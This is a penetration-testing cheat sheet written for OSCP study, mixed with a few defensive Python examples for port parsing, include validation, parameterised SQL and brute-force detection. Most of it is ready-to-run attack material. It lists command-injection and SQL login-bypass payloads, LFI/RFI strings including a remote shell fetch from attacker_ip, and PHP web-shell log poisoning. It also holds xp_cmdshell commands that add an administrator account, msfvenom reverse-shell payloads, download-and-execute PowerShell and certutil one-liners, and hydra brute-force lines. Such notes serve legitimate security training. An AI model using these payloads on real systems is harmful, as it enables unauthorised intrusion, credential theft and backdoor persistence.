Penetration Testing CheatSheet

While I was studying for the OSCP from various sources, I took notes and made a quick cheat sheet so that I don't need to search for the same thing again and again. I am sharing this cheat sheet because I think it might be useful for someone.

Enumeration

Enumeration is the most important part. All findings should be noted for future reference. Without enumeration, we will have a hard time exploiting the target.

Basic Enumeration

Whenever I start pentesting an IP address, my first and favourite tool is nmap. While nmap keeps scanning, I use a browser on the side to try connecting to some common ports, like firefox 10.10.1.10:8080.

Port Scanning & Service identifying

#Scan for all ports
$ nmap -vvv -Pn -p- -oN allports $target
#Quick scan of common UDP ports
$ nmap -sU -v -oN udpPorts $target

Filter all open ports for nmap script scanning:

$ grep '/tcp' allports | awk -F "/" '{print $1}'| tr '\n' ',';echo
#copy and paste the ports list to nmap '-p' and scan
$ nmap -sC -sV -p 1,2,3,4 -oN scriptscan $target
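The port-filtering step above can be done more robustly by parsing the nmap normal output and keeping only rows whose STATE is "open" (the grep '/tcp' pipeline also picks up filtered and closed rows). This is an added Python example, not part of the original cheat sheet; the allports contents are a constructed sample, not a real scan.

```python
import re
import shlex

# Constructed sample of `nmap -vvv -Pn -p- -oN allports` output (not a real scan).
SAMPLE_ALLPORTS = """\
# Nmap 7.91 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -vvv -Pn -p- -oN allports 10.10.1.10
Nmap scan report for 10.10.1.10
Host is up, received user-set (0.012s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE  REASON
21/tcp    open     ftp      syn-ack ttl 63
22/tcp    open     ssh      syn-ack ttl 63
80/tcp    open     http     syn-ack ttl 63
443/tcp   filtered https    no-response
3306/tcp  open     mysql    syn-ack ttl 63
# Nmap done at Mon Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""

# "21/tcp    open     ftp ..." -> port, proto, state, service
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def open_ports(nmap_normal_output, proto="tcp"):
    """Sorted list of ports whose STATE column is 'open' for the given protocol.
    Rows reported filtered/closed are skipped, unlike the grep '/tcp' pipeline."""
    ports = set()
    for line in nmap_normal_output.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(2) == proto and m.group(3) == "open":
            ports.add(int(m.group(1)))
    return sorted(ports)


def port_list(ports):
    """Comma-separated form accepted by nmap -p."""
    return ",".join(str(p) for p in ports)


def script_scan_command(ports, target, outfile="scriptscan"):
    """argv for the follow-up default-script and version scan of those ports."""
    return ["nmap", "-sC", "-sV", "-p", port_list(ports), "-oN", outfile, target]


if __name__ == "__main__":
    found = open_ports(SAMPLE_ALLPORTS)
    print(port_list(found))                                    # 21,22,80,3306
    print(shlex.join(script_scan_command(found, "10.10.1.10")))
```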

Automated Enumeration Script

Download: https://github.com/21y4d/nmapAutomator

./nmapAutomator.sh $target_ip All

Other Interesting tools

binwalk <image>
strings -n 8 <image/file>
steghide info <image>
strace <file>
ltrace <file>
file <file>
ls -la <file>

Pentesting Specific Service

If we have found some open ports, we can use the methods below to enumerate them!

Port 21(FTP)

Scan FTP with Nmap

nmap -vvv -sC -p21 $target

Login and Upload backdoor

ftp $target
ftp> USER anonymous
ftp> PASS anon@bytefellow.com
ftp> binary
ftp> put path/file_name.ext

Port 22(SSH)

Banner Grab

ssh root@target

Quick Brute Force

hydra -l root -P wordlist ssh://target_ip

Port 25(SMTP)

Username enumeration, useful for brute forcing:

$ nc $target 25
VRFY username

Port 53(DNS)

Forward Lookup:

for dns in $(cat namelist.txt);do host $dns.google.com;done|grep "has address"

Reverse Lookup:

for adr in $(seq 164 167); do host $ip.$adr;done|grep "pointer"

Test for zone transfer from your Kali machine:

$ host -t ns google.com
google.com name server ns3.google.com.
google.com name server ns2.google.com.
google.com name server ns4.google.com.
google.com name server ns1.google.com.

#Zone Transfer. If enabled, should list address!
$ host -l google.com ns4.google.com 
Using domain server: 
Name: ns4.google.com
Address: 216.239.38.10#53
Aliases: 

; Transfer failed.

$ dnsrecon -d bytefellow.com -t axfr #Zone Transfer
$ dnsenum -f namelist.txt bytefellow.com #brute force domain name

Enumerate using nslookup,dig and gobuster:

$ nslookup
>server $target_ip
.
.
>$target_ip
13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

$ dig axfr cronos.htb @10.10.10.13
$ gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 

Other tools to try:

host -l target name_server #Zone Transfer
dnsrecon -d target.com -t axfr #Zone Transfer
dnsrecon -d target.com -D ~/words.txt -t brt #brute force domain.
dnsenum target #Zone transfer

Port 79(Finger)

If the finger service is running, it is possible to enumerate usernames.

nmap -vvv -Pn -sC -sV -p79 $target

Port 80/443(HTTP/HTTPS)

What to check?

Manually browse the links. Identify the technology in use. Search for vulnerabilities in the identified software and versions. Gather information from the SSL certificate. Check for proxy-related vulnerabilities. Brute force directories and sensitive files. Check for hidden parameters. Find all input points. Find subdomains. View the HTML source, and also browse manually.

http://ip/robots.txt
http://ip/sitemap.xml
http://ip/not_exist

Identify technology using whatweb:

whatweb -a 3 $target

Scan using Nikto

nikto -h $target

If any CMS identified

wpscan --url http://$target -e p,t,u --detection-mode aggressive > wpscan.log #For wordpress scanning
wpscan -e vp --plugins-detection aggressive --api-token API_KEY --url http://172.31.1.8 #Scan for vulnerable plugins with API
droopescan scan drupal http://$target -t 32 # if drupal found
joomscan --ec -u $target #if joomla found

Brute Force Directory and Files

First use a small common wordlist, then a big wordlist, then try a CMS-related wordlist. Wordlist files in Kali Linux:

/usr/share/dirbuster/wordlists/directory-list-1.0.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/small.txt

Brute force directory and files using Gobuster:

#scan only for directory
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt 

#Scan for directory, and files extension of php,txt or conf
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf

#ignore Certificate check  
gobuster dir -u https://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k 

Password brute Forcing(wordpress example) using hydra:

hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

LFI and RFI

If a URL parameter carries a file name, we can test it for LFI/RFI. Request an invalid file and see if an error is displayed!

#target url
http://site/index.php?file=mail.php
# Does it display any error? We may get one by requesting an invalid file, e.g.:
# Warning: include(files/ninevehNotes): failed to open stream: No such file or directory in /var/www/html/direcotry/note.php on line 21

http://site/index.php?file=invalid.php

#Exploit
file=/etc/passwd
file=../../../../etc/passwd
file=/etc/passwd%00
file=/var/log/httpd-access.log
file=php://filter/read=convert.base64-encode/resource=/etc/passwd
file=php://filter/read=convert.base64-encode/resource=index

#May need to try different way to find the exploit:
file=thefile/note/../../../../../../../../../etc/passwd

#Remote file Inclusion!
file=http://attacker_ip/shell.txt

LFI can lead to code execution!

#Find or guess where the log files are, e.g. by including the web server config:
file=/usr/local/etc/apache24/httpd.conf 

Modify the User-Agent header and send the request using curl, Burp Suite or even netcat:

User-Agent: bytefellow: <?php system($_GET['cmd']); ?>

Now execute the command:

http://target/file.php?file=/var/log/access.log&cmd=id
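From the defender's side, the include() behind index.php?file= is fixed by validating the parameter before it is used. The Python function below is an added example, not code from the original page; the base directory is an assumption, and the function is checked against the file= payloads listed above, all of which it must reject.

```python
import os
import re
from urllib.parse import unquote

# Payloads copied from the list above; a correct handler must reject every one.
TRAVERSAL_PAYLOADS = [
    "/etc/passwd",
    "../../../../etc/passwd",
    "/etc/passwd%00",
    "/var/log/httpd-access.log",
    "php://filter/read=convert.base64-encode/resource=/etc/passwd",
    "php://filter/read=convert.base64-encode/resource=index",
    "thefile/note/../../../../../../../../../etc/passwd",
    "http://attacker_ip/shell.txt",
    "/usr/local/etc/apache24/httpd.conf",
]

ALLOWED_EXT = (".php",)                                # what this handler may include
SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")    # php://, http://, data:, ...


def resolve_include(base_dir, user_value):
    """Return the absolute file to include, or None if the request is unsafe.

    Checks: decode once, no NUL bytes, no stream wrappers or URLs, no absolute
    paths, allowed extension only, and the resolved path stays inside base_dir."""
    value = unquote(user_value)
    if "\x00" in value or SCHEME.match(value) or os.path.isabs(value):
        return None
    if not value.endswith(ALLOWED_EXT):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    # realpath also follows symlinks, so a link inside base_dir cannot escape it
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    base = "/srv/app/files"   # assumed directory that index.php includes from
    for p in TRAVERSAL_PAYLOADS + ["mail.php", "sub/../mail.php"]:
        print(f"{p:65} -> {resolve_include(base, p)}")
```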

Command Execution

If any parameters or input fields are found, we can try for command execution. Test every parameter and input field with these payloads (better to use Burp Suite Intruder):

#For Linux
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
<!--#exec%20cmd="/usr/bin/id;-->
/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
|id
|/usr/bin/id
|id|
|/usr/bin/id|
#For Windows
| dir
; dir
$(dir)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings*
; dir C:\Documents and Settings*
& dir C:\Documents and Settings*
&& dir C:\Documents and Settings*
dir C:\Documents and Settings*
| dir C:\Users
; dir C:\Users

SQLi for Login Bypass

If any login page is found, we should try to bypass the password check. These payloads are copied from: https://github.com/payloadbox/sql-injection-payload-list

'-'
' '
'&'
'^'
'' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or '''
"-"
" "
"&"
"^"
"" " or ""-" " or "" " " or ""&" " or ""^" " or """
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
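To see why the payloads above work, the following added Python example (not from the original page) builds the same login query two ways against a constructed in-memory SQLite table: by string concatenation, which the payloads bypass, and with bound parameters, which they do not.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory users table for the demo (one account, hashed password)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                ("admin", hashlib.sha256(b"s3cret-admin-pw").hexdigest()))
    return con


def vulnerable_login(con, username, password):
    """Query built by concatenation: the username is parsed as SQL, so quote
    and comment characters in it rewrite the WHERE clause."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + pw_hash + "'")
    try:
        return con.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False   # malformed payloads just break the query


def safe_login(con, username, password):
    """Parameterised query: the username is bound as a value and can never
    alter the statement, whatever characters it contains."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash)).fetchone()
    return row is not None


def bypass_results(username, password):
    """(vulnerable, safe) login outcome for one username/password pair."""
    con = make_db()
    return vulnerable_login(con, username, password), safe_login(con, username, password)


if __name__ == "__main__":
    for payload in ["admin' --", "admin' or '1'='1", "' or 1=1--", "admin"]:
        vuln, safe = bypass_results(payload, "wrong")
        print(f"{payload!r:22} concatenated={vuln!s:5} parameterised={safe}")
```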

Exploiting WebDav

If one method fails, another should be tested. If nothing works, find a different exploit!

Method 1:

davtest -url http://$target/webdav
cadaver http://$target/webdav
> put test.php

Method 2:

cp /usr/share/webshells/php/simple-backdoor.php bytef.php
curl -T 'bytef.php' 'http://ip/webdav/'

Method 3:

nmap -p 80 $ip_address --script http-put --script-args http-put.url='/webdav/bytef.php',http-put.file='backdoor/bytef.php'

Port 110(POP3)

Found user login information?

$ nc -vvv $target 110
USER test
PASS test

#list all mails
LIST 

#Retrieve a mail
retr mail_number

Port 111 (RPCINFO)

Connect with a null session.

nmap -v -p 111 --script=nfs* $ip
rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID

Port 137,138,139

nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137,138,139 -Pn -n <IP>

Port 445(SMB)

There is a big chance of getting sensitive information from SMB!

Enumerating SMB

#Enumerate
nmap -v -p 139,445 --script=smb-os-discovery,smb-ls,smb-enum-users,smb-enum-shares,smb-enum-sessions,smb-system-info $ip

#Scan for Vulnerability
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe=1 $ip

#Other tools
enum4linux -a $target
smbmap -h $target
smbclient -L -N //$target 
smbclient -L -U username //$ip

Connecting to share without password(Anonymous login)

smbclient -N //$ip/share
>recurse on
>prompt off
>cd directory
>mget directory

Login with Password

smbclient -U username //$ip/share

Port 389(LDAP)

ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons

Port 1433(MSSQL)

Reference: https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Brute force the "sa" password:

hydra -l sa -P password.txt -V $ip mssql

Connect to MSSQL Server:

sqsh -S server_address -U sa -P password

Enable xp_cmdshell:

exec sp_configure 'show advanced options', 1
go
reconfigure
go
exec sp_configure 'xp_cmdshell', 1
go
reconfigure
go

Execute System Command:

xp_cmdshell 'net user byte bytepass /add'
go
xp_cmdshell 'net localgroup Administrators byte /add'
go
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
go

Port 2049(NFS)

Enumerate shares

nmap -v -p 2049 --script=nfs* $ip
showmount -e $ip
showmount -a $ip

Mount shares in Kali Machine

mount -t nfs -o vers=2 target_ip:/home local_folder/ -o nolock

After mounting the filesystem, if we don't have read/write permission, we need to add a local user and edit /etc/passwd so its UID matches the owner of the files on the share:

root@kali:/home/bytef//nfs# adduser pwn
Adding user `pwn' ...
Adding new group `marcus' (1001) ...
Adding new user `marcus' (1001) with group `marcus' ...
Creating home directory `/home/pwn' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default 
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
root@kali:/home/bytef/nfs# nano /etc/passwd
pwn:x:1016:1016:,,,:/home/pwn:/bin/bash
root@kali:/home/bytef/nfs# su pwn

Now we can write files to the target folder of the network filesystem. For example:

pwn@kali:/home/bytef/nfs/pwn$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pwn/.ssh/id_rsa): /home/bytef/pwn/.ssh
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/bytef/nfs/pwn/.ssh
Your public key has been saved in /home/bytef/nfs/pwn/.ssh.pub
The key fingerprint is:
SHA256:/PH2zrnWxuuT18DFMZvN7WGS7ltUKdz4N+iYjTEZYiQ4 pwn@kali

Port 3306(MYSQL)

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>

Port 3389(RDP)

Connect to RDP

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP

Quick Brute force if a valid username found:

hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp

Add user to RDP Group

net localgroup "Remote Desktop Users" username /add

Port 5900/5800(VNC)

Scan with nmap

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 $ip

Connect using vncviewer from Kali

vncviewer [-passwd passwd.txt] <IP>::5901

Password Attack

Sometimes we need to do password guessing (we should!). For a better success rate we need a good password dictionary. We should also search online for default credentials!

I have collected some usernames and passwords for quick brute forcing, usually used for CTFs. These lists can be used to exploit weak passwords. Uploaded to GitHub:

Common Username Common Password

Common password

/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt

Generate Password using cewl

cewl -m 2 -d 5 -a -w pass1.txt http://$ip_address/dir/index.php

Brute Force using Burp

If it is a web form, we can brute force it in Intruder and use Grep - Match on the response. Some screenshots from Burp Suite:

To brute force a web form with hydra, we need to grab the POST data from Burp Suite carefully. Otherwise we will get false positives and waste lots of time! I tried to brute force OTRS and it worked.

Brute Force using Hydra

hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly.:H=Cookie: OTRSBrowserHasCookie=1"
hydra -l root@localhost -V -P pass1.txt $target_address.com http-form-post "/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=240&User=^USER^&Password=^PASS^:F=Login failed!"
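On the receiving end, a hydra run like the wp-login one earlier shows up in the web server access log as a burst of POST requests to the login URL that all return 200 (WordPress answers a failed login with the form again, and a successful one with a 302, which is why the hydra line above keys on a Location header). The added Python example below (not from the original page) flags that pattern per source IP over a sliding window; the log lines are a constructed sample in Apache combined format, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access log (Apache combined format), not a real capture.
# 10.10.14.5 hammers /wp-login.php; 192.168.1.20 logs in normally (302 on success).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0 (Hydra)"
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0 (Hydra)"
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0 (Hydra)"
192.168.1.20 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2980 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0 (Hydra)"
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3123 "-" "Mozilla/5.0 (Hydra)"
192.168.1.20 - - [01/Jan/2024:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Hydra)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """ip, timestamp, method, path (query stripped) and status of one line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def detect_login_bruteforce(lines, login_path="/wp-login.php",
                            threshold=5, window=timedelta(seconds=60)):
    """Map each source IP to the time it first reached `threshold` failed login
    POSTs (status 200) inside a sliding `window`. Lines must be in time order."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failed POSTs
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] != login_path:
            continue
        if ev["status"] != 200:   # 302 is the success redirect, not a failure
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ev["ip"] not in flagged:
            flagged[ev["ip"]] = ev["ts"]
    return flagged


if __name__ == "__main__":
    for ip, when in detect_login_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"possible login brute force from {ip}, threshold reached at {when}")
```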

Vulnerability and Exploitation

We have enumerated our target. Now Find vulnerabilities!

Find Vulnerability using Nmap

nmap -Pn -p 80,139,445,21 --script vuln $target

Using Searchsploit

#update database
searchsploit -u
#Searching variation
searchsploit afd windows local
searchsploit kernel 2.6
searchsploit oracle windows

#this will copy the exploit to current directory
searchsploit -m exploit_id 

Find Exploits using Google

Three kinds of searches should be enough to find a working exploit:

service_version Exploit
site: github.com service_version exploit
site: exploit-db.com service_version exploit

Working with Public Exploits

A public exploit might be written in Python, Ruby, C/C++ or any other language. Before executing the exploit:

Read the instructions carefully. Edit the target address, and the reverse connection IP and port.

Working with Shell

We have exploited a vulnerability and got a shell. Now what? Upgrade the shell? Privilege escalation? Fix shell issues?

Backdoor Files in Kali

Kali already has some web shells.

/usr/share/webshells

Quick Shells in Different Languages

Here it is: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

<?php system("whoami"); ?>
<?php system($_GET['cmd']); ?>
<?php echo exec("whoami");?>

Generate using msfvenom

#Staged Windows payload
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe

#Stageless Windows payloads
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

#Linux Stageless Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Linux Staged Payload
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Other Platform
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > reverse.jsp
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp

#Generate powershell payload
msfvenom -p windows/x64/powershell_reverse_tcp -o psh.ps1 -a x64 --platform windows LHOST=192.168.88.251 LPORT=8080

#Generate shellcode (C array format)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c

Upgrading Shell

Listening for Connection

nc -lvp 1337

Upgrade your unstable shell!

python -c 'import pty;pty.spawn("/bin/bash")'
^Z
stty raw -echo
fg

Running Python 3 http Server

#Python 3
python3 -m http.server
#python 2
python -m SimpleHTTPServer

Uploading Shell/File

After getting a shell, we may need to upload additional files or a stable backdoor.

Start HTTP server in Kali:

python3 -m http.server

If target OS is Linux:

wget http://host:8000/file.bin -O /dev/shm/filename.bin
curl http://host:8000/file.bin -o /dev/shm/filename.bin

If target OS is Windows:

#Download and Execute powershell script
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.15/Invoke-PowerShellTcp.ps1')

(New-Object Net.WebClient).DownloadFile("http://host/shell.exe","C:\Windows\Temp\shell.exe")
Invoke-WebRequest "http://host/shell.exe" -OutFile "shell.exe"
powershell.exe -c Invoke-WebRequest 10.10.0.67:8000/shell.exe -OutFile shell.exe

certutil -urlcache -split -f http://10.10.0.67:8000/shell.exe c:\windows\Temp\shell.exe && c:\windows\Temp\shell.exe

#Transfer via SMB share. An SMB server must be running on the attacker machine
copy \\host\share\shell.exe C:\path\shell.exe

Transfer file using impacket samba script:

#In kali start SMB Server
python3 smbserver.py byte /home/bytef/files


#on the victim machine view the share name
net view \\kali_ip
net use \\10.10.14.6\byte

#copy the file from shared folder
copy \\kali_ip\byte\file.ext file.ext

Pivot/Tunnel/Port Forwarding

Port forwarding is required when we can't access a specific service or another internal machine from our Kali machine!

Local Port Forwarding

Have SSH access with low privileges, and there are some ports open internally? Try local port forwarding.

-L binds a port on Kali; $ip:3306 is the address and port as reached from the target.

ssh -L 3306:$ip:3306 user@$target_ip

Remote Port Forwarding

No SSH access but a limited shell? And some weird port is open? Upload plink and try remote port forwarding with plink, or with ssh from the target:

ssh -R 3306:localhost:3306 root@kali_ip
ssh -R 3306:localhost:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@kali_ip

Connect to the tunneled port:

#Verify with nc
nc -vvv localhost 3306

#If mysql
mysql -u username -p -h 127.0.0.1 -P 3306

Dynamic Port Forwarding(Socks4)

Dynamic Port Forwarding from victim machine(Socks Proxy):

ssh -D 8080 -f -N user@$target_ip

With Dynamic Port Forwarding We can access/browse any ip range of the victim machine. We just need to configure proxychains.conf as follows:

nano /etc/proxychains.conf
...
socks4  127.0.0.1 8080

Now we can use any application through proxychains, such as:

proxychains firefox
proxychains nmap -sT -Pn -p139,445 $ip

Port Forwarding using Plink.exe

Remote port forwarding using plink. Needed when we can't reach a specific port on the target box from Kali!

plink.exe -ssh -l kali_user -pw kali_password -R $kali_ip:445:127.0.0.1:445 $kali_ip